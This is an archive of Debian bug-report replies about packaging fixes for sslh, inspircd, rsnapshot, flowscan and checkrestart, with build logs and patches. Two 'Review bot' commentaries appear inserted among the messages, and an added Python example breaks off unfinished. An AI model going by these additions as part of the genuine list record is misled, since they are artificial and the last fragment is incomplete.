Bug#740560: sslh fails to start with systemd as PID=1
On Sunday 02 March 2014 at 22:35 +0100, Gilles Filippini wrote:

Package: sslh
Version: 1.15-1
Severity: normal

Hi,

Hi,

I've just switched to systemd as init system on my box, and after reboot sslh wasn't running. From what I understand the cause of the failure is a missing /var/run/sslh directory. After adding the settings below to the sslh.service file, I can start it manually using invoke-rc.d but it keeps failing at boot time:

ExecStartPre=/bin/mkdir -p /var/run/sslh
ExecStartPre=/bin/chown -R sslh:sslh /var/run/sslh/

Instead, I can propose to use a /usr/lib/tmpfiles.d/sslh.conf file like this:

d /run/sslh 0755 sslh sslh -

I'll test this soon, but maybe you'll test this before me.

Please let me know about any missing information in this report.

Thanks,
_g.

-- 
Guillaume Delacour g...@iroqwa.org
Bug#669177: inspircd: unversioned dependency on package hurd on hurd-i386
On Friday 27 April 2012 at 09:32 +0100, Jonathan Wiltshire wrote:

Hi!

On 2012-04-26 19:33, Guillaume Delacour wrote:

On Wednesday 18 April 2012 at 00:01 +0100, Jonathan Wiltshire wrote:

E: inspircd: depends-on-essential-package-without-using-version depends: hurd

As inspircd uses libpthread, it seems to be a bug and will be fixed with the next upload of eglibc that includes libpthread (as #debian-hurd folks).

Ok. In that case please clone+retitle+reassign this bug to hurd and set appropriate Blocks so that it is documented somewhere.

I'm sorry, I didn't manage to find the origin of this bug, closing it now.

Thanks

-- 
Guillaume Delacour g...@iroqwa.org
Bug#668253: inspircd: does not close stdin or stderr on startup, consumes 100% cpu
On Wednesday 13 June 2012 at 20:24 +0930, Michael wrote:

Hello,

This bug is marked as fixed-upstream, however the bug has not been fixed in Debian stable. For me, the 100% CPU issue occurs with inspircd 1.1.22+dfsg-4+squeeze1, but not inspircd 1.1.22+dfsg-4, on two different systems. To me this indicates a bug in the security update.

Can this fix please be backported into stable? It makes the software unusable otherwise, and I have to hold off on applying the security update or upgrade to testing.

Instead of backporting the fix, the new version 2.0.5 (which fixes many issues) has been backported on 29 Mar 2013 into stable (which is Squeeze, oldstable today). Sorry for the late answer.

Thanks,
Michael

-- 
Guillaume Delacour g...@iroqwa.org
Bug#724874: [PKG-IRC-Maintainers] Bug#724874: inspircd: 2.0.15 now available
Hi,

On Monday 16 June 2014 at 14:45 +, Jeremy Stanley wrote:

On 2014-06-16 15:29:20 +0800 (+0800), David Adam wrote:

I removed my package so that Guillaume could upload his, but I think that took his 2.0.16 package away too - sorry.

Guillaume does have a 2.0.16 package available. It would be great to get that moving again... there are a lot of bug fixes between the 2.0.5 currently in Sid/Jessie and 2.0.16, so it would be disappointing to see Jessie release with those issues.

If the 2.0.16 source package is somewhere accessible or if Guillaume could put it back up on mentors.d.n, I'd be happy to review and test it (though not being a DD I can't sponsor of course).

I re-uploaded it again on mentors, thanks for the feedback!

-- 
Guillaume Delacour g...@iroqwa.org
Bug#724874: [PKG-IRC-Maintainers] Bug#724874: Bug#724874: inspircd: 2.0.15 now available
Hi all,

On Saturday 01 March 2014 at 15:14 +0100, Christoph Biedl wrote:

Christoph Biedl wrote...

Now I'd like to suggest the following procedure: Unless nobody objects by Thu March 6th, feel free to upload your inspircd packaging.

I prepared a package a few days ago but didn't finish it; here is the changelog:

  * New upstream release (Closes: #724874), enable m_regex_stdlib new module
  * Drop patches accepted upstream:
    + debian/patches/01_spelling_error.diff
    + debian/patches/03_CVE-2012-1836.diff (cherry-picked)
    + debian/patches/04_FTBFS_kfreebsd.diff
    + debian/patches/05_FTBFS_gcc-4.7.diff
  * debian/docs: docs/README has moved to README.md
  * debian/examples: examples are now in docs/conf
  * Bump debhelper compat to 9
  * Remove Bradley Smith as uploaders (Closes: #674890)
  * debian/watch: update based on sepwatch
  * Add systemd support:
    + Build-Depends on dh-systemd (= 1.5)
    + Add debian/inspircd.service, debian/inspircd.tmpfiles.d.conf
    + debian/rules: call generic dh with --with systemd
  * debian/control: Change Vcs-{Svn,Browser}, point to anonscm.debian.org and bump to Standards-Version 3.9.5 (no changes needed)
  * debian/patches/02_disable_rpath_for_extra_modules.diff: Refresh according upstream modules changes

 -- Guillaume Delacour g...@iroqwa.org Sat, 01 Feb 2014 15:36:52 +0100

I've started to rewrite debian/copyright too, I can just finish it. I propose to integrate David's diff into my version and add it to uploaders today or within the next week.

-- 
Guillaume Delacour g...@iroqwa.org
Bug#717451: Backups broken when ssh_args are set
On Thursday 25 July 2013 at 18:12 -0400, Michel L. wrote:

Package: rsnapshot
Version: 1.3.1-4
Followup-For: Bug #717451

Dear Maintainer,

Just want to confirm that rsnapshot is failing here as well. When using ssh_args, for example:

ssh_args -o BatchMode=yes -p 1234

I downgraded to rsnapshot 1.3.1-3[0], to get my backups working again.

[0] http://snapshot.debian.org/package/rsnapshot/1.3.1-3/#rsnapshot_1.3.1-3

You're both right, the ssh args are broken since I've applied the patch 10_space_destdir.diff [0]. The last upstream version is also impacted by these changes [1].

The solution proposed is the same as the one from the first reporter of this bug, and upstream is now thinking about a way to properly handle rsync --rsh= arguments. As rsnapshot remote backup with ssh is now broken, I'll include the proposed workaround as a countermeasure (at least temporarily).

[0]: http://rsnapshot.cvs.sourceforge.net/viewvc/rsnapshot/rsnapshot/rsnapshot-program.pl?revision=1.414view=markup
[1]: https://github.com/DrHyde/rsnapshot/pull/1

-- 
Guillaume Delacour g...@iroqwa.org
Bug#717940: Incorrect description of rsync_numtries in rsnapshot.conf
On Saturday 27 July 2013 at 00:59 +0200, Jonathan Leroy wrote:

Package: rsnapshot
Version: 1.3.1-1
Severity: minor
Tags: upstream

Hi,

Hi,

The description of rsync_numtries setting in rsnapshot.conf seems to be incorrect:

# Number of rsync re-tries. If you experience any network problems or
# network card issues that tend to cause ssh to crap-out with
# Corrupted MAC on input errors, for example, set this to a non-zero
# value to have the rsync operation re-tried
#
#rsync_numtries 0

The configuration says set this to a non-zero value, what do you suggest to be more precise? (I never use this option, but think it's quite clear like this.) I agree that the default commented value should be 1 instead of 0.

-- 
Guillaume Delacour g...@iroqwa.org
Bug#710283: inspircd: Starting Inspircd fails on writing to PID file
On Wednesday 29 May 2013 at 16:45 +0200, Tim Gouma wrote:

Package: inspircd
Version: 2.0.5-1+b1
Severity: grave
Tags: upstream
Justification: renders package unusable

Hi,

After configuration Inspircd always fails to start with the following error in /var/log/inspircd.log

Wed May 29 16:33:24 2013: Failed to write PID-file 'data/inspircd.pid', exiting.

But in the config file the pid file location is configured as /var/run/inspircd.pid

-- System Information:
Debian Release: 7.0
 APT prefers stable
 APT policy: (500, 'stable')
Architecture: i386 (x86_64)
Kernel: Linux 3.2.0-4-amd64 (SMP w/1 CPU core)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages inspircd depends on:
ii libc6 2.13-38
ii libgcc1 1:4.7.2-5
ii libgeoip1 1.4.8+dfsg-3
ii libgnutls26 2.12.20-6
ii libldap-2.4-2 2.4.31-1+nmu2
ii libmysqlclient18 5.5.31+dfsg-0+wheezy1
ii libpcre3 1:8.30-5
ii libpq5 9.2.4-1.pgdg70+1
ii libsqlite3-0 3.7.13-1+deb7u1
ii libstdc++6 4.7.2-5
ii libtre5 0.8.0-3
ii lsb-base 4.1+Debian8
ii zlib1g 1:1.2.7.dfsg-13

inspircd recommends no packages.

Versions of packages inspircd suggests:
pn gnutls-bin none
pn ldap-server none
pn mysql-server none
pn postgresql none
pn sqlite3 none

-- Configuration Files:
/etc/default/inspircd changed:
INSPIRCD_ENABLED=1

/etc/inspircd/inspircd.conf changed:
pid file=/var/run/inspircd.pid /

Problem with /^

You've edited your configuration and added a slash before , this is why inspircd fails to start (reproduced with wheezy chroot). The correct (package default) directive might be:

pid file=/var/run/inspircd.pid

- Cut Irrelevant Parts of Config file -

-- no debconf information

-- 
Guillaume Delacour g...@iroqwa.org
Bug#678333: fails to terminate it's own testcode
On Wed, Jun 20, 2012 at 11:48:32PM +0200, Andreas Barth wrote:

Package: sslh
Version: 1.13b-2
Severity: serious

Hi,

Hi,

this package fails to terminate its testcode properly (at least on mipsel) and therefore requires the buildd to timeout the build (and wastes endless time):

buildd 18416 1 0 21:27 ? 00:00:00 sh -c ./echosrv --listen ip6-localhost:9000 --prefix 'ssh: '
buildd 18417 1 0 21:27 ? 00:00:00 sh -c ./echosrv --listen ip6-localhost:9001 --prefix 'ssl: '
buildd 18419 18416 0 21:27 ? 00:00:00 ./echosrv --listen ip6-localhost 9000 --prefix ssh:
buildd 18420 18417 0 21:27 ? 00:00:00 ./echosrv --listen ip6-localhost 9001 --prefix ssl:
buildd 18421 18419 0 21:27 ? 00:00:00 ./echosrv --listen ip6-localhost 9000 --prefix ssh:
buildd 18422 18420 0 21:27 ? 00:00:00 ./echosrv --listen ip6-localhost 9001 --prefix ssl:

Please make sure whatever happens that the testcode is terminated.

You're absolutely right; I didn't see that *ALL* buildds were waiting for the process to be terminated (Build killed with signal TERM after 150 minutes of inactivity).

Upstream calls killall echosrv in the testcode, but the package (psmisc) is not essential, so not installed on buildd. I've reproduced the problem with pbuilder and I'll just add a Build-Depends on psmisc in 1.13b-3.

Andi

-- 
Guillaume Delacour
Bug#660385: php5-imagick: ignores memory limit
Hello,

The resource type RESOURCETYPE_MEMORY on php-imagick corresponds to ImageMagick MAGICK_MEMORY_LIMIT, which defines how much memory can be used to reserve memory for tasks; when the limit is reached, cached memory-mapped disk is used:

http://fr2.php.net/manual/en/imagick.setresourcelimit.php
http://www.imagemagick.org/script/resources.php#environment

So whatever value you use in setResourceLimit for RESOURCETYPE_MEMORY, the tasks are processed (less or more quickly).

-- 
Guillaume Delacour g...@iroqwa.org
Bug#650406: sslh: does not start automatically during Debian init process
Hello,

On Wednesday 25 January 2012 at 00:07 +0100, Philippe Basinska wrote:

On 22/01/2012 21:26, Guillaume Delacour wrote:

Hello,

On Saturday 17 December 2011 at 21:34 +0100, Guillaume Delacour wrote:

On Tuesday 29 November 2011 at 16:51 +0100, Philippe Basinska wrote:

Package: sslh
Version: 1.6i-4
Severity: normal
Tags: patch

Hello,

I didn't tag the issue with 'squeeze' label since I can't test it right now on a testing system. However, init script of sslh seems different in version 1.9. Whatever, my stable sslh daemon does not start automatically with Debian Squeeze. The command `invoke-rc.d sslh start` is good enough to fix the issue until next reboot.

Any news on this issue? Is my explanation correct?

Hi Guillaume,

I just rolled back my hack to try your solution. I mean that I removed the LSB tag to start sshd before sslh and I updated the SysV init links. Then I added the option to log stuff in /var/log/boot.

Now, sslh starts during each boot. Even if I didn't change anything in my network interface. I tried a few times to be sure but it works fine and I got no relevant information in log (indeed, the sslh daemon starts...).

Starting ssl/ssh multiplexer : sslh SSL addr: 127.0.0.1:443 (after timeout 2s) SSH addr: 127.0.0.1:22 listening on 192.168.2.1:443 turning into sslh

I assume the problem disappeared because I changed rc2.d links. Actually, both ssh and sslh start much later so the network must be available.

server-bl:~# ls -l /etc/rc2.d/ | grep ssh\|sslh
lrwxrwxrwx 1 root root 13 25 janv. 00:03 S22ssh - ../init.d/ssh
lrwxrwxrwx 1 root root 14 24 janv. 23:58 S24sslh - ../init.d/sslh

See you,

So I close this bug report, feel free to reopen if you have other issues about this.

-- 
Guillaume Delacour g...@iroqwa.org
Bug#669177: inspircd: unversioned dependency on package hurd on hurd-i386
Hi,

On Wednesday 18 April 2012 at 00:01 +0100, Jonathan Wiltshire wrote:

Source: inspircd
Version: 2.0.5-1
Severity: important

This is a lintian error:

E: inspircd: depends-on-essential-package-without-using-version depends: hurd

As inspircd uses libpthread, it seems to be a bug and will be fixed with the next upload of eglibc that includes libpthread (as #debian-hurd folks).

-- System Information:
Debian Release: wheezy/sid
 APT prefers unstable
 APT policy: (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 3.2.0-2-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.utf8, LC_CTYPE=en_GB.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

-- 
Guillaume Delacour g...@iroqwa.org
Bug#660372: fix cmd_postexec - allow unmounting of snapshot root by cmd_postexec config option
tags 660372 moreinfo
thanks

Hi,

On Saturday 18 February 2012 at 18:53 +0100, Mike Gabriel wrote:

Package: rsnapshot
Version: 1.3.1-1
Severity: normal
Tags: squeeze

With rsnapshot from lenny it was possible to copy backups to a mounted USB hard disk and unmount the USB disk after rsnapshot had finished. For the unmounting I used the cmd_postexec configuration parameter.

With rsnapshot from squeeze this is not possible anymore. rsnapshot complains with ,,Device or resource busy'' (meaning: the USB disk cannot be unmounted because rsnapshot has its current working directory within the snapshot root somewhere).

With this issue report I would like to provide a patch (against rsnapshot in squeeze) that might solve the problem. (,,might'' means here: the problem occurs at a customer's site where I cannot test the patch ATM, but it is very likely that the patch fixes the reported issue).

I'm not sure the problem is the cmd_{pre,post}exec commands; the following tests work well in a squeeze chroot test environment (I only use rsnapshot to backup to local storage):

fake usb device disk with ext3 fs mounted on loopback

$ dd if=/dev/zero of=/tmp/usb_fake_disk bs=1M count=128
$ sudo mkfs -t ext3 /tmp/usb_fake_disk
$ sudo mount -o loop /tmp/usb_fake_disk /mnt/ ls /mnt \ sudo umount /mnt/

minimal rsnapshot.conf

$ egrep -v '^($|#)' /etc/rsnapshot.conf
config_version 1.2
snapshot_root /mnt/
cmd_rm /bin/rm
cmd_rsync /usr/bin/rsync
cmd_logger /usr/bin/logger
cmd_preexec /bin/mount -o loop /tmp/usb_fake_disk /mnt/
cmd_postexec /bin/umount /mnt/
interval hourly 6
interval daily 7
interval weekly 4
verbose 2
loglevel 3
lockfile /var/run/rsnapshot.pid
backup /etc/ localhost/

launch a job to validate

$ sudo rsnapshot -v hourly
echo 19163 /var/run/rsnapshot.pid
/bin/mount -o loop /tmp/usb_fake_disk /mnt/
mkdir -m 0755 -p /mnt/hourly.0/
/usr/bin/rsync -a --delete --numeric-ids --relative --delete-excluded /etc \ /mnt/hourly.0/localhost/
touch /mnt/hourly.0/
/bin/umount /mnt/
rm -f /var/run/rsnapshot.pid
$ sudo mount -o loop /tmp/usb_fake_disk /mnt/ \ ls /mnt/hourly.0/localhost/ etc Can you check the issue by running the rsnapshot cron jobs with the -v flag and redirect stderr to a logfile to verify that the problem is not the usb disk itself (to long to umount, etc.) or its usage (use lsof or fuser to verify that no other task use the mountpoint, etc.) ? It would be great to have information about this issue, to definitively eliminate or not cmd_{pre,post}exec behavior (and maybe great to validate your patch too). Thanks. The patch will be send with a follow-up mail. -- System Information: Debian Release: 6.0.4 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.32-5-amd64 (SMP w/4 CPU cores) Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages rsnapshot depends on: ii liblchown-perl 1.01-1Perl interface to the lchown() sys ii logrotate 3.7.8-6 Log rotation utility ii perl 5.10.1-17squeeze3 Larry Wall's Practical Extraction ii rsync 3.0.7-2 fast remote file copy program (lik Versions of packages rsnapshot recommends: ii openssh-client1:5.5p1-6+squeeze1 secure shell (SSH) client, for sec rsnapshot suggests no packages. -- no debconf information -- Guillaume Delacour g...@iroqwa.org signature.asc Description: Ceci est une partie de message numériquement signée
Bug#665260: sslh: FTBFS: Can't exec lcov: No such file or directory at ./t line 298.
listening on: localhost:9002 localhost:9002
timeout to ssh: 2
listening to 2 addresses
localhost:9002:bind: Address already in use
exited with 1
# Failed test 'Exit status if can't open PID file'
# at ./t line 265.
# got: '1'
# expected: '3'
not ok 25 - Exit status if can't open PID file

I think this is the same problem here.

***Test: Can't bind address
spawned 19256
ssh addr: localhost:9000. libwrap service: sshd family 10 10
ssl addr: localhost:9001. libwrap service: (null) family 10 10
listening on: fx-in-f106.1e100.net:9000
timeout to ssh: 2
listening to 1 addresses
fx-in-f106.1e100.net:9000:bind: Cannot assign requested address
exited with 1
ok 26 - Exit status if can't bind address
***Test: Can't resolve address
spawned 19257
Name or service not known `blahblah.dontexist'
exited with 4
ok 27 - Exit status if can't resolve address
Can't exec lcov: No such file or directory at ./t line 298.
Can't exec genhtml: No such file or directory at ./t line 299.
Can't exec killall: No such file or directory at ./t line 301.
# Looks like you failed 2 tests of 27.

The problem is just here; the upstream test suite fails on 2 tests, see above.

1..27
make[1]: *** [test] Error 2

The full build log is available from: http://people.debian.org/~lucas/logs/2012/03/21/sslh_1.10-3.log

A list of current common problems and possible solutions is available at http://wiki.debian.org/qa.debian.org/FTBFS . You're welcome to contribute!

About the archive rebuild: The rebuild was done on about 50 AMD64 nodes of the Grid'5000 platform, using a clean chroot. Internet was not accessible from the build systems.

[1]: http://bugs.debian.org/660269

--
Guillaume Delacour g...@iroqwa.org
Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory
On Tuesday 20 March 2012 at 21:58 +0100, Guillaume Delacour wrote:

On Wednesday 07 March 2012 at 02:33 +0100, Guillaume Delacour wrote:

I'm afraid, there is another problem with fano and field schroots: 127.0.0.1 appears to point twice to localhost, so sslh tries to listen twice to localhost (--listen 127.0.0.1:$sslh_port in t test file). I've pinged christoph on irc to know if it is possible to fix /etc/hosts on these boxes, otherwise i'll refresh the patch i've made to bind to 127.0.0.1 and not localhost.

--
Guillaume Delacour g...@iroqwa.org

The 1.10-3 version does not completely fix the problem: there are yet other issues with localhost entries in /etc/hosts on buildd:

***Test: Changing to non-existant username
spawned 21450
ssh addr: localhost:9000. libwrap service: sshd family 28 28
ssl addr: localhost:9001. libwrap service: (null) family 28 28
listening on: localhost:9002 localhost:9002
timeout to ssh: 2
listening to 2 addresses
localhost:9002:bind: Address already in use
exited with 1
not ok 24 - Exit status on non-existant username
# Failed test 'Exit status on non-existant username'
# at ./t line 249.
# got: '1'
# expected: '2'
***Test: Can't open PID file
spawned 21451
ssh addr: localhost:9000. libwrap service: sshd family 28 28
ssl addr: localhost:9001. libwrap service: (null) family 28 28
listening on: localhost:9002 localhost:9002
timeout to ssh: 2
listening to 2 addresses
localhost:9002:bind: Address already in use
exited with 1
not ok 25 - Exit status if can't open PID file
# Failed test 'Exit status if can't open PID file'
# at ./t line 265.
# got: '1'
# expected: '3'
***Test: Can't bind address

I've contacted a kfreebsd build admin who should make some changes in /etc/hosts in schroot to fix all these issues.

Thanks to christoph, sslh now builds on kfreebsd-*. I can really close this bug.

--
Guillaume Delacour g...@iroqwa.org
Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory
On Wednesday 07 March 2012 at 02:33 +0100, Guillaume Delacour wrote:

I'm afraid, there is another problem with fano and field schroots: 127.0.0.1 appears to point twice to localhost, so sslh tries to listen twice to localhost (--listen 127.0.0.1:$sslh_port in t test file). I've pinged christoph on irc to know if it is possible to fix /etc/hosts on these boxes, otherwise i'll refresh the patch i've made to bind to 127.0.0.1 and not localhost.

--
Guillaume Delacour g...@iroqwa.org

The 1.10-3 version does not completely fix the problem: there are yet other issues with localhost entries in /etc/hosts on buildd:

***Test: Changing to non-existant username
spawned 21450
ssh addr: localhost:9000. libwrap service: sshd family 28 28
ssl addr: localhost:9001. libwrap service: (null) family 28 28
listening on: localhost:9002 localhost:9002
timeout to ssh: 2
listening to 2 addresses
localhost:9002:bind: Address already in use
exited with 1
not ok 24 - Exit status on non-existant username
# Failed test 'Exit status on non-existant username'
# at ./t line 249.
# got: '1'
# expected: '2'
***Test: Can't open PID file
spawned 21451
ssh addr: localhost:9000. libwrap service: sshd family 28 28
ssl addr: localhost:9001. libwrap service: (null) family 28 28
listening on: localhost:9002 localhost:9002
timeout to ssh: 2
listening to 2 addresses
localhost:9002:bind: Address already in use
exited with 1
not ok 25 - Exit status if can't open PID file
# Failed test 'Exit status if can't open PID file'
# at ./t line 265.
# got: '1'
# expected: '3'
***Test: Can't bind address

I've contacted a kfreebsd build admin who should make some changes in /etc/hosts in schroot to fix all these issues.

--
Guillaume Delacour g...@iroqwa.org
Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory
Hi,

On Thursday 23 February 2012 at 22:46 +0100, Guillaume Delacour wrote:

It seems to be a problem in both buildd kfreebsd hosts fano and field: the ip6-localhost entry points to 127.0.0.1 (with correct entries, on fresh install of debian/kfreebsd for example, the problem does not appear). As a workaround, i can patch upstream test suite to force to bind IPv6 loopback ::1 instead of ip6-localhost.

I'm afraid, there is another problem with fano and field schroots: 127.0.0.1 appears to point twice to localhost, so sslh tries to listen twice to localhost (--listen 127.0.0.1:$sslh_port in t test file). I've pinged christoph on irc to know if it is possible to fix /etc/hosts on these boxes, otherwise i'll refresh the patch i've made to bind to 127.0.0.1 and not localhost.

--
Guillaume Delacour g...@iroqwa.org
Bug#635065: RFP: whatweb -- Next generation web scanner' from 'ITP: whatweb -- Next generation web scanner
I don't think i have the time to maintain another package (which is written in ruby, which i don't really know), but i think it could be interesting to introduce it to Debian; please find attached the work i've started a few months ago, in case it could be reusable by the future maintainer.

--
Guillaume Delacour g...@iroqwa.org

whatweb_0.4.7-1.debian.tar.gz Description: application/compressed-tar
Bug#620960: RFS: inspircd
On Saturday 03 March 2012 at 14:53 +0100, Helmut Grohne wrote:

On Wed, Dec 14, 2011 at 10:25:37PM +0100, Guillaume Delacour wrote:

On Saturday 03 December 2011 at 11:39 +0100, Jan Lübbe wrote:

On Tue, 2011-11-01 at 22:00 +0100, Guillaume Delacour wrote:

To access further information about this package, please visit the following URL: http://mentors.debian.net/package/inspircd

Alternatively, one can download the package with dget using this command:

dget -x http://mentors.debian.net/debian/pool/main/i/inspircd/inspircd_2.0.5-1.dsc

It seems you've replaced that package with a new one on 2011-11-30. Did you want that one uploaded, too?

Yes, the package on mentors (2011-11-30) is the package i want to upload in the archive (i forgot to include some stuff a few days ago and regenerated/reuploaded it on mentors).

Since the mentors migrated to debexpo your package is 404. Can you reupload? Additionally I suggest that you also report a bug against sponsorship-requests with severity important, as your upload fixes an rc bug.

I just reuploaded the package as it was removed from mentors the 25 of february.

Helmut

--
Guillaume Delacour g...@iroqwa.org
Bug#660044: flowscan: diff for NMU version 1.006-13.1
On Tuesday 28 February 2012 at 00:53 +0100, Leo Iannacone wrote:

tags 660044 + patch
tags 660044 + pending
thanks

Dear maintainer,

I've prepared an NMU for flowscan (versioned as 1.006-13.1) and uploaded it to DELAYED/3. Please feel free to tell me if I should delay it longer.

Hello,

I acknowledge this, i've seen your message too late to find a sponsor for fixing the bug. I tried a while to work on a new version of the package which integrates direct upstream changes (and these modifications are made by the previous maintainer) into quilt patches, but never finalized it.

Regards.

reverted: --- flowscan-1.006/configure.in +++ flowscan-1.006.orig/configure.in @@ -135,13 +135,13 @@ dnl Checks for misc. +AC_MSG_CHECKING(that service name for 80/tcp is http) +if $PERL_PATH -I$perllib -MSocket -e 'exit(http eq getservbyport(80, tcp)? 0 : 1)' -AC_MSG_CHECKING(that service name for 80/tcp is www) -if $PERL_PATH -I$perllib -MSocket -e 'exit(www eq getservbyport(80, tcp)? 0 : 1)' then AC_MSG_RESULT(yes) else AC_MSG_RESULT(no) + AC_MSG_ERROR(Please change /etc/services so that the service name for 80/tcp is http with alias www, www-http) - AC_MSG_ERROR(Please change /etc/services so that the service name for 80/tcp is www with alias http, www-http) fi AC_OUTPUT(Makefile flowscan graphs.mf example/crontab util/locker util/add_ds.pl util/add_txrx util/event2vrule util/ip2hostname) reverted: --- flowscan-1.006/configure +++ flowscan-1.006.orig/configure 
@@ -1296,14 +1296,14 @@ +echo $ac_n checking that service name for 80/tcp is http... $ac_c 16 +echo configure:1301: checking that service name for 80/tcp is http 5 +if $PERL_PATH -I$perllib -MSocket -e 'exit(http eq getservbyport(80, tcp)? 0 : 1)' -echo $ac_n checking that service name for 80/tcp is www... $ac_c 16 -echo configure:1301: checking that service name for 80/tcp is www 5 -if $PERL_PATH -I$perllib -MSocket -e 'exit(www eq getservbyport(80, tcp)? 0 : 1)' then echo $ac_tyes 16 else echo $ac_tno 16 + { echo configure: error: Please change /etc/services so that the service name for 80/tcp is http with alias www 12; exit 1; } - { echo configure: error: Please change /etc/services so that the service name for 80/tcp is www with alias http 12; exit 1; } fi trap '' 1 2 15 diff -u flowscan-1.006/debian/changelog flowscan-1.006/debian/changelog --- flowscan-1.006/debian/changelog +++ flowscan-1.006/debian/changelog @@ -1,3 +1,11 @@ +flowscan (1.006-13.1) unstable; urgency=low + + * Non-maintainer upload. + * Fix configure looking for http service instead of www +(Closes: 660044, LP: #935087). + + -- Leo Iannacone l...@ubuntu.com Tue, 28 Feb 2012 00:50:32 +0100 + flowscan (1.006-13) unstable; urgency=low * New maintainer (Closes: #402663).

--
Guillaume Delacour g...@iroqwa.org
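Review bot: the configure.in check still compares the result of getservbyport(80, tcp) against a single literal, so switching that literal between www and http only moves the failure to hosts whose /etc/services names 80/tcp the other way round. Accept either name in the Perl one-liner and reword the AC_MSG_ERROR text to match. The same edit is also made by hand in the generated configure, whose error text already differs from configure.in (it lacks the www-http alias); carrying the change as a quilt patch on configure.in and regenerating configure would keep the two from drifting.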
Bug#660269: FTBFS on kfreebsd-*: cat: /tmp/sslh_test.pid: No such file or directory
Hi,

On Friday 17 February 2012 at 22:03 +0100, Luca Falavigna wrote:

Source: sslh
Version: 1.10-1
Severity: serious
Justification: fails to build from source

sslh fails to build from source on kfreebsd-*, but built in the past:

Connection refused
***Test: big message
Connection refused
***Test: Stalled connection
Connection refused
Connection refused
cat: /tmp/sslh_test.pid: No such file or directory
killing
Can't kill a non-numeric process ID at ./t line 192.
# Looks like your test exited with 1 before it could output anything.
make[1]: *** [test] Error 1

https://buildd.debian.org/status/fetch.php?pkg=sslh&arch=kfreebsd-amd64&ver=1.10-1&stamp=1328484132
https://buildd.debian.org/status/fetch.php?pkg=sslh&arch=kfreebsd-i386&ver=1.10-1&stamp=1328499099

It seems to be a problem in both buildd kfreebsd hosts fano and field: the ip6-localhost entry points to 127.0.0.1 (with correct entries, on fresh install of debian/kfreebsd for example, the problem does not appear). As a workaround, i can patch upstream test suite to force to bind IPv6 loopback ::1 instead of ip6-localhost.

--
Guillaume Delacour g...@iroqwa.org
Bug#659420: flowscan: Uses perl4 corelibs without Depends
On Friday 10 February 2012 at 23:44 +, Dominic Hargreaves wrote:

Package: flowscan
Version: 1.006-13
Severity: normal
User: debian-p...@lists.debian.org
Usertags: perl4-corelibs

Dear maintainer,

Hello,

This package currently uses one or more deprecated perl 4 era packages, as shown on the lintian report[1]:

usr/bin/locker:7 getopts.pl

As detailed at [2] we would like you to either add a dependency on libperl4-corelibs-perl | perl ( 5.12.3-7) or (ideally) to replace their use with more modern equivalents. We'd like to have this in place for wheezy, so that we can follow cleanly the upstream deprecation cycle in wheezy+1.

If you prefer, I will NMU your package with the dependency added.

Go ahead, i lack time to update this package. Thanks.

The wiki page [2] has references (taken from the source of the libraries in question) for the recommended replacement libraries.

Thanks,
Dominic.

[1] http://lintian.debian.org/tags/script-uses-perl4-libs-without-dep.html
[2] http://wiki.debian.org/Teams/DebianPerlGroup/OpenTasks/Transitions/Perl4CoreLibs

--
Guillaume Delacour g...@iroqwa.org
Bug#657087: checkrestart: Detect real command for interpreted languages
Package: debian-goodies
Version: 0.59
Severity: wishlist
Tags: patch

Hello,

Checkrestart is very useful for daemons written in C, but fails to detect the real command when the daemon is written in an interpreted language.

(As an example) I propose the attached patch, which reads /proc/pid/cmdline just in the case where the executable command (/proc/pid/exe) is linked to an interpreter (the regex is definitely not complete; i only tested it for perl and python daemons running on my boxes).

With this, the command passed to dpkg-search --search successfully finds the initscript used to restart the daemon.

-- System Information:
Debian Release: wheezy/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.38-12-generic (SMP w/4 CPU cores)
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)
Shell: /bin/sh linked to /bin/dash

Versions of packages debian-goodies depends on:
ii curl 7.23.1-3
ii dctrl-tools [grep-dctrl] 2.20.1
ii dialog 1.1-20111020-1
ii less 444-1
ii perl 5.14.2-6
ii python 2.7.2-9
ii whiptail 0.52.14-7

Versions of packages debian-goodies recommends:
ii lsof 4.81.dfsg.1-1

Versions of packages debian-goodies suggests:
pn popularity-contest none
pn xdg-utils 1.1.0~rc1+git20111210-5
pn zenity none

-- no debconf information

--- /usr/sbin/checkrestart 2011-10-25 00:20:00.0 +0200 +++ /tmp/checkrestart 2012-01-23 22:59:43.052505207 +0100 @@ -426,6 +426,18 @@ try: self.program = os.readlink('/proc/%d/exe' % self.pid) +# if the executable command is an interpreter such as perl/python, +# we want to find the real program +m = re.match(^/usr/bin/(perl|python)$, self.program) +if m: +with open('/proc/%d/cmdline' % self.pid, 'r') as cmdline: +# only match program in /usr (ex.: /usr/sbin/smokeping) +# ignore child, etc. +m = re.search(r'^(([/]\w*){1,5})\s.*$', cmdline.read()) +if m: +# store the real full path of script as the program +self.program = m.group(1) + except OSError, e: if e.errno != errno.ENOENT: raise
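Review bot: the re.search over cmdline.read() requires whitespace (\s) after the path, but /proc/<pid>/cmdline separates arguments with NUL bytes, and with the ^ anchor the first candidate is argv[0], the interpreter itself, so the script is only found when the process has rewritten its title into a space-separated string. Split the buffer on '\0', skip argv[0] and the interpreter options, and take the first remaining argument; \w* also rejects path components that contain '-' or '.'. The interpreter test ^/usr/bin/(perl|python)$ will miss versioned binaries, because readlink on /proc/<pid>/exe returns the resolved file (for example /usr/bin/python2.7).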
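The lookup described in this report, as an added example in Python 3 (not the submitted patch and not debian-goodies code): it splits /proc/<pid>/cmdline on NUL bytes, skips argv[0] and interpreter options, and also accepts a rewritten process title. The function names and option tables are assumptions made for illustration, and the sample command lines are constructed.

```python
import os
import re

# /proc/<pid>/exe points at the resolved binary, so versioned names such as
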